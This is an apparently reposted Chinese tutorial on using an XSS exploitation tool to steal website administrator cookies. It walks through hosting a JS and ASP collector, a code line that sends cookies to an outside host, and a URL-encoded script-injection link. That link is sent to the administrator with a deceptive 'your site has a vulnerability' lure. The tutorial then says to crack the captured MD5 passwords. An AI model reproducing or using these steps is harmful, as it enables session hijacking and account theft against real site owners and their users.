牛B装备 XSS 漏洞利用工具[使用教程]
牛B装备 XSS 漏洞利用工具[使用教程]
作者:佚名 来源:本站整理 发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr
工具下载地址:http://www.7747.net/Soft/200912/16400.html
图片:
在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人不知道怎么用.
现在就说一下流程吧.
把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么就需要修改JS文件.把
img.src = "http://www.7747.net/g.asp?key="+str; (把红色部分修改掉,在后面添加上自己的路径.)
然后找到JS的地址,如[http://www.7747.net/g.js]
<a href=跨站漏洞地址<script src=http://127.0.0.1/g.js>管理员您好,您的网站有漏洞</a>
在此是我们就把 <script src=http://127.0.0.1/g.js> 进行URL加密.
<a href=跨站漏洞地址%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%67%2E%6A%73%3E>管理员您好,您的网站有漏洞</a>
最后把这个盗取连接发送给管理员,只要他点击.那么COOKIE就会自己保存到ASP文件夹中设置的.COOKIE.TXT(程序默认)的文本文件中.
打开保存有管理员 帐号 密码 的COOKIE 密码在进行MD5解密就可以了.
原文地址:http://www.zzfhw.com/wenzhang/html/fangheishow-18559.html